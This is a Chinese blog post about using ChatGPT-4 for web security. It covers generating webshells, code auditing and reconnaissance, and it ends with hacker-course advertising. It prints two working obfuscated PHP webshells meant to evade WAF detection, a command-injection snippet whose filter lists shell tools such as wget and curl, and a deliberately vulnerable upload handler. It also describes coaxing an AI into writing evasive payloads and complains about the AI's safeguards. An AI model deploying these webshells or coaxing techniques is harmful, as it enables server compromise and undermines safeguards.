浅谈ChatGPT-4在网络安全中的应用

GPT-4震撼发布:多模态大模型,直接升级ChatGPT、必应,开放API,游戏终结了

GPT-4 实现了以下几个方面的飞跃式提升:强大的识图能力;文字输入限制提升至 2.5 万字;回答准确性显著提高;能够生成歌词、创意文本,实现风格变化。

这里浅谈ChatGPT-4在网络安全中的应用
在这里插入图片描述

前言

ChatGPT是美国人工智能研究实验室OpenAI新推出的一种人工智能技术驱动的自然语言处理工具,最近ChatGPT又出圈了,之前已经在技术社区火了一把现在传播到了大众面前,我不禁又对这个神奇的AI产生了一些思考,在之前我只是让其辅助写一些简单的逻辑程序,于是我想知道它是否也能在网络安全领域实现一些它的价值呢,本文就这个话题来探讨一下它在网络安全里面一些应用和实践。

在这里插入图片描述

自身定位

在实践之前,我想向ChatGPT问一下它自己对于这个问题的回答是什么,即让它自己对信息安全领域起的作用进行一些分析,结果还是挺让人惊讶的:
在这里插入图片描述

它回答的十分全面,里面有一些内容连我自己都没有想到,于是我对探讨它在信息安全领域的作用的兴趣进一步加深,下面我便对它进行了一些测试。

构造恶意代码

这里就先以最简单的一句话木马为例,我向它提问是否能构造一个对网站产生威胁的恶意语句,AI很轻松的便回答出来了:
在这里插入图片描述

看来简单的恶意语句还是对它来说还是很轻松的,于是我继续向它提问一些进阶的问题,因为若我们要直接传入木马,大概率会被拦截,但可以尝试一些绕过方式来绕过设备的检测,举个例子,我用\x65编码字符串e,然后使用array类型进行混淆:

<?php array_map("ass\x65rt",(array)$_REQUEST['xino']);?>    //1.php

通过上面的操作,一些危险函数就有可能绕过检测,于是我尝试让它用字符编码的方式来构造恶意木马:
在这里插入图片描述
AI完整的写完了,根据其代码逻辑实际上也是可以利用的,到这我继续加深难度:
在这里插入图片描述
可能是我尝试次数比较少的原因,并没有达到我理想的条件,或许再多增加一些限制条件会达到更好的效果,但是不难看出随着AI的逐渐进化,以后我们对一些WAF或杀毒软件进行测试时,可以结合AI来对产品代码进行分析,让AI构造出可以绕过的木马。
在测试时我还尝试让AI分析带有危险函数的代码,对下面这段恶意代码:

<?$_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_uU(40).$_uU(36).$_uU(95).$_uU(80).$_uU(79).$_uU(83).$_uU(84).$_uU(91).$_uU(49).$_uU(93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU(101).$_uU(95).$_uU(102).$_uU(117).$_uU(110).$_uU(99).$_uU(116).$_uU(105).$_uU(111).$_uU(110);$_=$_fF("",$_cC);@$_();?> //7.php

在这里插入图片描述
这又给我们提供了一个思路,通过AI结合防火墙来达到动态分析恶意请求的想法,进而加强我们设备的安全性。

漏洞源码分析

尝试完上面的项目,我开始思考,能否结合AI来进行代码审计,众所周知,白盒测试又称结构测试、透明盒测试、逻辑驱动测试或基于代码的测试。通过分析代码找到里面的漏洞点来维护网络安全,如果AI和它碰撞会产生什么样的火花呢?下面看一个例子:

我用一个简单的代码让其分析一下:

分析代码:<?php
if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/;|.*c.*a.*t.*|.*f.*l.*a.*g.*| |[0-9]|*|.*m.*o.*r.*e.*|.*w.*g.*e.*t.*|.*l.*e.*s.*s.*|.*h.*e.*a.*d.*|.*s.*o.*r.*t.*|.*t.*a.*i.*l.*|.*s.*e.*d.*|.*c.*u.*t.*|.*t.*a.*c.*|.*a.*w.*k.*|.*s.*t.*r.*i.*n.*g.*s.*|.*o.*d.*|.*c.*u.*r.*l.*|.*n.*l.*|.*s.*c.*p.*|.*r.*m.*|`|%|\x09|\x26|>|</i", $c)){system($c);}
}else{highlight_file(__FILE__);

结果还是很方便理解的,给出了这段代码的作用以及过滤的所有字符,我们可以根据这些提示来进行渗透或者防护。从而减少了一些排查时间。
在这里插入图片描述
之后我让其分析一个简单的有文件上传漏洞的代码,这是一个比较实际的问题,因为出现文件上传漏洞的原因是各种各样的,比如之前文章提到的白名单绕过就是因为存在可控参数目录造成的,下面是含有漏洞的代码:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {if (file_exists(UPLOAD_PATH)) {if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {$temp_file = $_FILES['upload_file']['tmp_name'];$img_path = UPLOAD_PATH . '/' . $_FILES['upload_file']['name']            if (move_uploaded_file($temp_file, $img_path)) {$is_upload = true;} else {$msg = '上传出错!';}} else {$msg = '文件类型不正确,请重新上传!';}} else {$msg = UPLOAD_PATH.'文件夹不存在,请手工创建!';}
}

经过了十几次的改善,给了我如下还算合理的回复:
在这里插入图片描述
虽然回答没啥毛病但这是经过十几次更新我筛选出来的,个人认为AI现在还达不到分析一些大量代码来给出一些合理的漏洞攻击思路,当然也可能是我提问的方式有问题,有时会出现答非所问的情况,不过我觉得随着技术更新这些小问题应该可以解决。

信息收集

在进行网站渗透时,基本的渗透流程可以参考下面我总结的图:
在这里插入图片描述
不管是网站信息或是网站所用服务的信息都是非常重要的,这会考察一个渗透人员的信息收集能力,收集到的信息越多对我们的渗透帮助越大,于是我想试试AI能否协助我们进行这个操作。

我试着用AI查询某网站的旁站,很快便列出了许多:
在这里插入图片描述
当然这只是最基础的,我们通过工具也可以进行查询,但AI搜索速度还是远远大于工具的,这不妨是一个我们进行渗透测试时可以快速进行资产收集的好途径。说到这我们不妨进一步思考,作为帮助我们渗透的工具,若我已经收集到了网站所用框架以及版本,我想问问它如何渗透:
在这里插入图片描述
这里AI给出了我们一个可利用的CVE漏洞,那么我继续向其提问具体利用方式:

在这里插入图片描述
就很有意思了,它真的给我们提供了一个脚本,先不提这个脚本,我觉得在渗透中有个AI能够随时帮助我们收集信息和脚本这能大大加快我们的渗透过程,我希望未来能发展成这样的趋势。让渗透人员少一些不必要的操作从而加大效率。

结语

目前ChatGPT为了防止恶意用户的应用,限制了对于主动构造攻击脚本的一些请求,这使得其不能展现更多的在网络安全领域的价值,本文结合我在之前收集的一些资料,简单分析了一下ChatGPT在网络安全领域的一些可能性,其中包含了一些已经实现和希望未来可以实现的一些想法,无论是AI构造代码或者进行全自动白盒分析,这都会对我们网络安全领域产生一些深远的影响,我希望这些想法可以在不远的未来实现。

黑客学习资源免费分享,保证100%免费!!!

需要的话可以点击:CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

👉网安(黑客)全套学习视频👈
我们在看视频学习的时候,不能光动眼动脑不动手,比较科学的学习方法是在理解之后运用它们,这时候练手项目就很适合了。

在这里插入图片描述
在这里插入图片描述

👉网安(黑客红蓝对抗)所有方向的学习路线👈
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
在这里插入图片描述

👉黑客必备开发工具👈
工欲善其事必先利其器。学习黑客常用的开发软件都在这里了,给大家节省了很多时间。

这份完整版的网络安全(黑客)全套学习资料已经上传至CSDN官方,朋友们如果需要点击下方链接即可前往获取【保证100%免费】。

需要的话可以点击CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/2499.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

当ChatGPT遇到网络安全!如何入门网络安全?

ChatGPT&#xff1a;是人工智能技术驱动的自然语言处理工具&#xff0c;它能够通过学习和理解人类的语言来进行对话&#xff0c;还能根据聊天的上下文进行互动&#xff0c;真正像人类一样来聊天交流&#xff0c;甚至能完成撰写邮件、视频脚本、文案、翻译、代码等任务。GPT 是 …

ChatGPT Network Error 在使用chatGPT的过程中回答到一半显示网络错误

目录 问题描述 可能原因 解决办法 官方回复 问题描述 今天在使用ChatGPT的时候&#xff0c;发现它在返回答案是时候有字数限制&#xff0c;在超过一定数量的答案输出以后会显示network error如下图所示&#xff1a; 令人沮丧的是&#xff0c;ChatGPT的这个BUG甚至删除了答…

ChatGPT科普

ChatGPT是一个大语言模型&#xff08;LLM&#xff09;&#xff0c;它根据已有的内容&#xff0c;循环的生成下一个合理的内容&#xff0c;准确的说是一个token。每次循环的时候&#xff0c;都会生成一份带有概率的token列表&#xff0c;从这个概率列表中挑选一个token拼接到文本…

ChatGPT:你真的了解网络安全吗?浅谈攻击防御进行时之传统的网络安全

ChatGPT&#xff1a;你真的了解网络安全吗&#xff1f;浅谈网络安全攻击防御进行时 传统的网络安全总结 ChatGPT&#xff08;全名&#xff1a;Chat Generative Pre-trained Transformer&#xff09;&#xff0c;美国OpenAI 研发的聊天机器人程序&#xff0c;是人工智能技术驱动…

ChatGPT与网络安全

文章目录 一、“AI用于攻击”二、“AI用于安全&#xff08;防御&#xff09;”三、“AI的防御”四、“AI被攻击” ChatGPT作为基于生成式预训练模型&#xff08;GPT&#xff09;的聊天机器人&#xff0c;其核心技术是自然语言处理&#xff08;NLP&#xff09;。随着NLP技术的不…

一款可以让 ChatGPT 联网的神器!

我们知道&#xff0c;不论是 GPT-3.5 还是 GPT-4.0&#xff0c;他们的知识库都是截至到 2021 年 9 月的。还无法实现即时联网并获取最新的咨询信息。 我之前在星球分享过的谷歌浏览器插件 ChatGPT for Google&#xff0c;可以在进行谷歌网页搜索的同时&#xff0c;获取 ChatGPT…

ChatGPT火了,将给网络安全行业带来什么影响?

ChatGPT火了&#xff0c;将给网络安全行业带来什么影响&#xff1f; 一、简介 作为全新的人工智能&#xff08;AI&#xff09;聊天机器人&#xff0c;ChatGPT被认为正在“掀起新一轮AI革命”。在股市上甚至出现了“ChatGPT概念股”的当下&#xff0c;ChatGPT究竟对于网络安全…

ChatGPT写的程序:下载3GPP规范 | 51学通信

首先感叹下&#xff0c;ChatGPT确实是强大。我谢谢它。 本文分享一段它写的代码。用于下载某个指定页面的指定后缀文件。 具体是通过这个代码下载 https://www.3gpp.org/ftp/Specs/2022-12/Rel-18/38_series 这个链接下的所有zip文件。 也就是2022年12月发布的最新的R18的38系列…

人机交互新时代:多维度快速看清ChatGPT(附下载)

来源&#xff1a; 资本实验室 自2022年11月底首次发布以来&#xff0c;ChatGPT迅速走红&#xff0c;并火爆全球。针对这一现象&#xff0c;资本实验室对ChatGPT的发展简史、融资历程、用户增长、主要技能等信息进行了盘点&#xff0c;并梳理了与ChatGPT相关的平台竞争、行业应用…

基于C#制作一个桌面ChatGPT助手

使用WinForm制作一个AI助手,在工作或者学习时提升自己的效率,工欲善其事,必先利其器。 一、前言1.1、什么是模型1.2、常见应用场景1.3、AI发展趋势二、开发步骤2.1、项目创建2.2、界面设置控件显示控件事件2.3、获取版本2.4、回调处理参数校验数据显示一、前言 1.1、什么是…

ChatGPT与VBA:Excel操作一键搞定的全能助手

摘要 Excel是一款广泛应用于数据处理和分析的工具&#xff0c;而VBA&#xff08;Visual Basic for Applications&#xff09;是一种用于编程自动化Excel操作的语言。然而&#xff0c;对于非专业的Excel用户来说&#xff0c;VBA编程可能具有一定的难度。本文将探讨如何利用Chat…

如何调教ChatGPT成为你的策略助手

量化策略开发&#xff0c;高质量社群&#xff0c;交易思路分享等相关内容 『正文』 ˇ 去年12月的时候我们初次体验ChatGPT,《ChatGPT生成量化交易策略》. 当时还是很惊喜的&#xff0c;可以辅助写代码&#xff0c;写注释&#xff0c;给出一些示例。使用的时间长了发现写一…

如何让ChatGPT成为科研工作中的小助手?(附使用指南)

大家好&#xff0c;我是带我去滑雪&#xff01; 从2022年年底发布叫ChatGPT的人工智能聊天机器人以来&#xff0c;逐渐强势进入了各行各业&#xff0c;一夜火爆全网&#xff0c;它使用自然语言处理技术来与用户进行交互和沟通&#xff0c;可以回答用户关于知识、娱乐、生活等方…

ChatGPT个人助手产品应用实现

目录 一、ChatGPT框架简介二、自训练模型1、数据预处理2、神经网络模型3、训练过程4、模型评估与优化 三、Fine-tune方式四、Embeddings方式 一、ChatGPT框架简介 ChatGPT是一个基于Transformer的神经网络模型,专注于对话任务。它能够与人进行流畅的会话,解决简单的问题,并回答…

利用ChatGPT打造个人AI聊天助手

目标 利用ChatGPT&#xff0c;借助开源项目&#xff0c;搭建自己方便易用的AI聊天助手。 先说结论&#xff0c;我已经搭建成功&#xff0c;可以用我的先体验&#xff1a;https://chat.wayss000.cn/ &#xff08;链接失效时&#xff0c;请搜索公众号【Build_AI_Assistant】获取…

ChatGPT 用来干这些,可真香!

ChatGPT 是什么&#xff1f; ChatGPT 是一款由 OpenAl 开发的语言模型产品&#xff0c;它能够模拟人类的语言行为&#xff0c;与用户进行自然的交互。ChatGPT 基于GPT-3.5&#xff08;Generative Pretrained Transformer 3.5&#xff09;的语言模型建造&#xff0c;通过使用大…

ChatGPT这么火,如果ChatGPT滥用或者重度依赖,会怎么样?

目录 绪论 风险 风险1 - 思维能力&#xff1a; 风险2-历史文献&#xff1a; 风险3-舆论问题&#xff1a; 总结 我们都知道&#xff0c;现在最火的就是ChatGPT&#xff0c;各大大厂都在讨论它&#xff0c;马大大也出山讨论它&#xff0c;可想而知&#xff0c;已经火到什么地…

ChatGPT的各种骚操作

ChatGPT&#xff0c;美国“开放人工智能研究中心”研发的聊天机器人程序 [12] &#xff0c;于2022年11月30日发布 [2-3]。ChatGPT是人工智能技术驱动的自然语言处理工具&#xff0c;它能够通过学习和理解人类的语言来进行对话&#xff0c;还能根据聊天的上下文进行互动&#xf…

全球最大的 ChatGPT 开源替代品来了,支持 35 种语言,网友:不用费心买 ChatGPT Plus了!

自去年 11 月 ChatGPT 面向公众测试以来&#xff0c;OpenAI 一直占据各大科技网站的头版头条&#xff0c;以及成为很多开发者工具的首选。ChatGPT 的落地不仅仅可以提供代码建议、总结长文本、回答问题等等&#xff0c;更为重要的是它开启了 AIGC 的新时代。 不过由于 OpenAI …

使用ChatGPT的方法和替代方案

作为互联网应用&#xff0c;ChatGPT也有国内化的替代方案。在国内&#xff0c;一些公司已经开始利用深度学习技术开发本地化的语言模型&#xff0c;例如阿里巴巴的通义千问、华为的盘古大语言模型&#xff0c;以及百度的文心一言等等&#xff0c;这些模型可以完成自然语言处理任…